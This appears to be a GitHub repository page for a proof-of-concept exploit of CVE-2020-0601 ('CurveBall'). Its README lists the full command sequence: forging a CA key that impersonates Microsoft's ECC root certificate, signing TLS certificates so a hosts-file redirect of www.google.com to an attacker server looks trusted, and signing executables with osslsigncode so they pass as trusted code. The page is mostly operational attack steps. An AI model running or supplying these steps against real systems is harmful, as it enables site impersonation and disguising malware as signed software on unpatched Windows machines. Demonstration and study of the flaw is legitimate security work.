Skip to content

JoelBts/CVE-2020-0601_PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

curveball

curveball

 
 

README.md

README.md

 
 

curveball-demo-steps.pdf

curveball-demo-steps.pdf

 
 

Repository files navigation

Based on POC's https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file

REQUIREMENTS/SOFFTWARE USED

python version 3.11 openssl version 3.1 osslsigncode version 2.5 python libraries in gen-key.py httpServer.py

TLS CERTIFICATE SIGNING

Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Create a spoofed CA using the spoofed key

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Create another SSL certificate (of any kind) that will be signed by the spoofed CA

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Create a certificate signing request for the certificate

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Sign the CSR using the spoofed CA certificate

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Start a HTTPS server with the spoofed certificate chain

python httpServer.py

IN WINDOWS MACHINE

Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)

visit HTTPS://www.google.com

Certificate should be trusted, and 'Hello World' should be displayed

If error occurs, check system time is correct

CODE SIGNING

Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Create a spoofed CA using the spoofed key

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Create a new key that can be used for code signing

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Create a certificate signing request using the key, which we can sign

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Sign the CSR using the spoofed CA

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Use the PKCS12 file to sign an executable

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

About

Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages